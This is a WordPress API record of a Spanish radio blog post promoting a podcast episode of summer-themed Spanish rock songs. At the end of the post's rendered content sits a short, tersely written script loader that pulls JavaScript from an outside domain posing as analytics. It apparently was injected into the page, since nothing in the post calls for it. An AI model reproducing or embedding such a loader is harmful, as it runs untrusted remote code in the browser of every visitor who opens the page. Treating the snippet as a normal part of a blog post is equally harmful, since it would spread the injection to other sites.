{"id":4995,"date":"2024-08-01T21:03:56","date_gmt":"2024-08-01T21:03:56","guid":{"rendered":"https:\/\/radiojabato.es\/?p=4995"},"modified":"2026-04-20T15:20:56","modified_gmt":"2026-04-20T15:20:56","slug":"la-jabateka-canciones-de-verano-en-el-rock-espanol","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=4995","title":{"rendered":"LA JABATEKA: \u00abCanciones de Verano en el  Rock Espa\u00f1ol.\u00bb"},"content":{"rendered":"\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_132280959_6_1.html?c1=d03644\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<p>Para refrescarnos un poco ante estas altas temperaturas, Ismael Calle nos trae en esta entrega veraniega de \u00abLa Jabateka\u00bb, canciones inspiradas en esta c\u00e1lida estaci\u00f3n. Artistas y bandas de rock espa\u00f1ol que nos evocan situaciones y lugares vacacionales, para hacer m\u00e1s llevadero este elevado calor.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"517\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/08\/photo_2023-08-10_19-02-28.jpg\" alt=\"\" class=\"wp-image-4996\" style=\"width:215px;height:auto\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/08\/photo_2023-08-10_19-02-28.jpg 720w, https:\/\/radiojabato.es\/wp-content\/uploads\/2024\/08\/photo_2023-08-10_19-02-28-300x215.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Para refrescarnos un poco ante estas altas temperaturas, Ismael Calle nos trae en esta entrega veraniega de \u00abLa Jabateka\u00bb, canciones inspiradas en esta c\u00e1lida estaci\u00f3n. Artistas y bandas de rock [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[870],"tags":[],"class_list":["post-4995","post","type-post","status-publish","format-standard","hentry","category-la-jabateka"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4995","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4995"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4995\/revisions"}],"predecessor-version":[{"id":14351,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/4995\/revisions\/14351"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4995"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4995"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4995"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}